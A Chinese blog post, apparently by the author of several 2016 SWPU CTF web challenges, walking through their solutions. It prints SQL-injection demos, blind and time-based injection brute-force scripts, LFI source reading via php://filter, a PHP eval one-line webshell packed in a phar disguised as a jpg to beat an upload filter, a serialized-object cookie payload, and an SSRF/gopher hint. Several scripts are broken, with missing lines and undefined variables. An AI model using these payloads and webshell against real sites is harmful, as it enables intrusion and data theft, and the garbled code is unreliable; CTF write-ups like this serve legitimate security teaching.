2016 SWPU 自己做出题目的思路分享

mysql> select 1 from dual where 1=1=1=(select '');
Empty set (0.16 sec)

mysql> select 1 from dual where 1=1=1=(select '1');
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

mysql> select 1 from dual where 1=1=1=(select 0);
Empty set (0.19 sec)

mysql> select 1 from dual where 1=1=1=(select 1);
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)


mysql> select substring('admin' from 5) from dual;
+---------------------------+
+---------------------------+
| n                         |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 4) from dual;
+---------------------------+
+---------------------------+
| in                        |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 3) from dual;
+---------------------------+
+---------------------------+
| min                       |
+---------------------------+
1 row in set (0.00 sec)

mysql> select substring('admin' from 2) from dual;
+---------------------------+
+---------------------------+
| dmin                      |
+---------------------------+
1 row in set (0.00 sec)



__author__ = 'niexinming'
import urllib2
data="abcdefghijklmnopqrstuvwxyz1234567890"
xx=""
flag=0
listdata=list(data)
for jj in range(0,33)[::-1]:
#print jj
for ii in listdata:
#print post_data
flag=1
xx=ii+xx
print xx
break
else:
flag=0

unzip${IFS}2.zip 然后在网站的admin目录下就有一个2.php，地址： http://web1.08067.me/admin/2.php 然后拿到flag ------------------------------------------------------------------------------------------web2------------------------------------------------------------------------------------------------------------------------- web2 http://web2.08067.me: 首先这个题目给出一个提示:里面有个include.php 打开http://web2.08067.me/include.php，查看源码发现又一个提示：<!-- upload.php --> 发现有上传的地方，但是上传的地方只能上传图片文件，因为有个include.php有个任意包含漏洞，可以利用lfi读取upload.php和include.php的源码 读取源代码的方法： http://web2.08067.me/include.php?file=php://filter/convert.base64-encode/resource=upload 把upload.php的源码以base64的方式返回回来，解码之后： <form action="" enctype="multipart/form-data" method="post" name="upload">file:<input type="file" name="file" /><br> <input type="submit" value="upload" /></form> <?php if(!empty($_FILES["file"]))
{
echo $_FILE["file"];$allowedExts = array("gif", "jpeg", "jpg", "png");
@$temp = explode(".",$_FILES["file"]["name"]);
$extension = end($temp);
if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
|| (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
|| (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
&& (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts)) { move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]); echo "file upload successful!Save in: " . "upload/" .$_FILES["file"]["name"];
}
else
{
}
}
?>


http://web2.08067.me/include.php?file=php://filter/convert.base64-encode/resource=include

<html>
Tips: the parameter is file! :)
</html>
<?php
@$file =$_GET["file"];
if(isset($file)) { if (preg_match('/http|data|ftp|input|%00/i',$file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
{
echo "<p> error! </p>";
}
else
{
include($file.'.php'); } } ?>  发现每一个地方都被限制死死的，包含的地方不能截断而且包含的文件只能是.php结尾的，上传的文件只能是图片文件 看来只有一种办法了，参考http://www.php.net/manual/zh/wrappers.phar.php 能用到phar:// 这个协议了 如何创建一个phar文件呢？ 方法一： 参考：https://segmentfault.com/a/1190000002166235 http://www.mamicode.com/info-detail-888559.html 现在我来创建自己的php的打包文件phar 首先在创建一个目录，名字是1 然后在1那个目录底下创建一个index.php内容是： <?php @eval($_POST['c']);?>

<?php
$phar = new Phar('my.phar');$phar->buildFromDirectory(__DIR__.'/1', '/.php$/');$phar->compressFiles(Phar::GZ);
$phar->stopBuffering();$phar->setStub($phar->createDefaultStub('index.php')); 然后在shell中执行在1目录外面生成一个叫my.phar的打包文件 把my.phar改成my.jpg上传，然后访问： http://web2.08067.me/include.php?file=phar://upload/heheda.jpg/index 这样一句话木马就可以执行了 方法二： 直接把一个一句话木马的php文件压缩成zip格式，然后把文件后缀改成jpg，然后上传，以同样的方式访问也能执行木马 不知道为什么用菜刀连接不到，我自己用php代码来读一下目录下有什么文件吧： 下面是php一句话读取目录： $dh=opendir("./");while (($file = readdir($dh)) !== false){echo $file."<br>";} 然后发现flag文件在swpu_wbe2_tips.txt 直接访问：http://web2.08067.me/swpu_wbe2_tips.txt 就可以得到flag和下一个题目的提示 --------------------------------------------------------------------------------------------------------web3----------------------------------------------------------------------------------------------------------- http://web3.08067.me/wakeup/index.php 官方给了提示： .bak泄露,index.php.bak,function.php.bak 首先看index.php.bak的源码： if(isset($_COOKIE['user'])){
$login = @unserialize(base64_decode($_COOKIE['user']));
if(!empty($login->pass)){$status = $login->check_login(); if($status == 1){
$_SESSION['login'] = 1; var_dump("login by cookie!!!"); } } }  看function.php.bak class help { static function addslashes_deep($value)
{
if (empty($value)) { return$value;
}
else
{
if (!get_magic_quotes_gpc())
{
$value=is_array($value) ? array_map("help::addslashes_deep", $value) : help::mystrip_tags(addslashes($value));
}
else
{
$value=is_array($value) ? array_map("help::addslashes_deep", $value) : help::mystrip_tags($value);
}
return $value; } } static function remove_xss($string) {
$string = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '',$string);

$parm1 = Array('javascript', 'union','vbscript', 'expression', 'applet', 'xml', 'blink', 'link', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'base');$parm2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','href','action','location','background','src','poster');

$parm3 = Array('alert','sleep','load_file','confirm','prompt','benchmark','select','and','or','xor','update','insert','delete','alter','drop','truncate','script','eval','outfile','dumpfile');$parm = array_merge($parm1,$parm2, $parm3); for ($i = 0; $i < sizeof($parm); $i++) {$pattern = '/';
for ($j = 0;$j < strlen($parm[$i]); $j++) { if ($j > 0) {
$pattern .= '(';$pattern .= '(&#[x|X]0([9][a][b]);?)?';
$pattern .= '|(�([9][10][13]);?)?';$pattern .= ')?';
}
$pattern .=$parm[$i][$j];
}
$pattern .= '/i';$string = preg_replace($pattern, '****',$string);
}
return $string; } static function mystrip_tags($string)
{
$string = help::new_html_special_chars($string);
$string = help::remove_xss($string);
return $string; } static function new_html_special_chars($string) {
$string = str_replace(array('&', '"', '<', '>','&#'), array('&', '"', '<', '>','***'),$string);
return $string; } // 实体出库 static function htmlspecialchars_($value)
{
if (empty($value)) { return$value;
}
else
{
if(is_array($value)){ foreach ($value as $k =>$v) {
$value[$k] = self::htmlspecialchars_($v); } }else{$value = htmlspecialchars($value); } return$value;
}
}
//sql 过滤
static function CheckSql($db_string,$querytype='select')
{
$clean = '';$error='';
$old_pos = 0;$pos = -1;
if($querytype=='select') {$notallow1 = "[^0-9a-z@\._-]{1,}(load_file|outfile)[^0-9a-z@\.-]{1,}";
if(preg_match("/".$notallow1."/i",$db_string))
{
exit("Error");
}
}
//完整的SQL检查
while (TRUE)
{
$pos = strpos($db_string, '\'', $pos + 1); if ($pos === FALSE)
{
break;
}
$clean .= substr($db_string, $old_pos,$pos - $old_pos); while (TRUE) {$pos1 = strpos($db_string, '\'',$pos + 1);
$pos2 = strpos($db_string, '\\', $pos + 1); if ($pos1 === FALSE)
{
break;
}
elseif ($pos2 == FALSE ||$pos2 > $pos1) {$pos = $pos1; break; }$pos = $pos2 + 1; }$clean .= '$s$';
$old_pos =$pos + 1;
}
$clean .= substr($db_string, $old_pos);$clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean))); if (strpos($clean, '@') !== FALSE  OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE
OR strpos($clean,'$ss$')!== FALSE) {$fail = TRUE;
if(preg_match("#^create table#i",$clean))$fail = FALSE;
$error="unusual character"; } elseif (strpos($clean, '/*') !== FALSE ||strpos($clean, '-- ') !== FALSE || strpos($clean, '#') !== FALSE)
{
$fail = TRUE;$error="comment detect";
}
elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~is', $clean) != 0) {$fail = TRUE;
$error="slown down detect"; } elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~is',$clean) != 0)
{
$fail = TRUE;$error="slown down detect";
}
elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~is', $clean) != 0) {$fail = TRUE;
$error="file fun detect"; } elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~is',$clean) != 0)
{
$fail = TRUE;$error="file fun detect";
}
if (!empty($fail)) { exit("Error" .$error);
}
else
{
return $db_string; } } } class login{ var$uid = 0;
var $name=''; var$pass='';

//检查用户是否已登录
mysql_conn();
$sqls = "select * from phpinfoadmin where username='$this->name'";
$sqls = help::CheckSql($sqls);
$re = mysql_query($sqls);
$results = @mysql_fetch_array($re);
//echo $sqls .$results['passwd'];
mysql_close();
if (!empty($results)) { if($results['passwd'] == $this->pass) { return 1; } else { return 0; } } } //预防cookie某些破坏导致登陆失败 public function __destruct(){$this->check_login();
}
//反序列化时检查数据
public function __wakeup(){
$this->name = help::addslashes_deep($this->name);
$this->pass = help::addslashes_deep($this->pass);
}
}
?>


O:5:"login":4:{s:3:"uid";i:0;s:4:"name";s:6:"heheda";s:4:"pass";s:32:"00af6f190235a168c57be5cff86668b0";}

select count(*) from information_schema.columns, information_schema.columns T1,information_schema.columns T2

__author__ = 'niexinming'
import base64
import urllib
import urllib2
import base64
import time
#ll=list("abcdefghijklmnopqrstuvwxyz1234567890")
#llascii=[]
#for jj in ll:
#    llascii.append(ord(jj))
for kk in range(1,32):
print "di : "+str(kk)
for i in range(32,127):
start= time.time()
url="http://web3.08067.me/wakeup/index.php"
sql="select flag from flag"
payload="admin'and ascii(substring((%s),%s,1))=%s and (select count(*) from information_schema.columns, information_schema.columns T1,information_schema.columns T2)=1 and '1'='1" % (sql,str(kk),str(i))
#print xueliehua
b64=base64.b64encode(xueliehua)
urlencodedata=urllib.quote(b64)
#print urlencodedata
resual= urllib2.urlopen(r)
end= time.time()
#print str(end-start)+":",
#print chr(i)
if 20>(end-start)>8:
print "this this:"+str(kk)+" : "+chr(i)
break



--------------------------------------------------------------------------------------------------------web5-----------------------------------------------------------------------------------------------------------

http://web5.08067.me/

ssrf,关注下其他的协议,flag不在本机

DEVICE=eth0
TYPE=Ethernet
UUID=a1ca5d0e-61c9-4693-82ee-437eb0331617
ONBOOT=yes
NM_CONTROLLED=yes
BOOTPROTO=static
GATEWAY=172.16.181.2
DNS1=114.114.114.114
DNS2=172.16.181.2

gopher协议，百度百科有对这个协议的介绍：

error names

# -*- coding: utf-8 -*-

import re
import os
import requests
import time
import urllib
for x in range(1,40):
print "di:"+str(x)
for i in range(32,127):
content_len=length+23
# print content_len
# print url

res=requests.get(url).text
print chr(i)
break

10-31

11-01 2152

10-03 1139

04-14 56万+

03-19 80万+

03-03 1万+

10-24 2563

11-10 195

10-31 2498

03-13 14万+

11-03 2548

02-18 452

02-25 37万+

02-13 28万+

01-05 27万+

02-06 19万+

01-27 12万+

02-03 18万+

02-26 1020

02-11 12万+

11-12 1788

02-19 8万+

08-20 1万+

02-15 1万+

03-04 12万+

03-16 9万+

03-05 5万+

03-08 4万+

03-08 6万+

03-12 10万+

02-15 18万+

03-10 5万+

03-13 10万+

03-01 1万+

08-02 1687

03-10 12万+

03-10 17万+

10-31

02-19 16万+

02-27 7万+

03-01 12万+

03-04 5281

03-06 1950

03-08 2万+

03-10 6074

04-05 1万+

03-15 1124

03-17 1997

03-17 6798

03-18 4万+

03-19 5万+

03-19 7万+

03-19 3万+

03-20 4495

03-22 2万+

03-23 3万+

03-22 3万+

03-23 4万+

03-24 2万+

03-25 8万+

03-26 3万+

03-27 4万+

03-29 20万+

03-29 9万+

03-30 14万+

05-21 2637

05-25 4520

03-23 9889

04-02 3万+

04-06 6万+

04-07 4万+

04-09 7万+

04-09 2万+

04-11 5万+

04-12 9060

04-11 2万+

04-15 5万+

04-18 4万+

应聘3万的职位，有必要这么刁难我么。。。沙雕。。。

©️2019 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客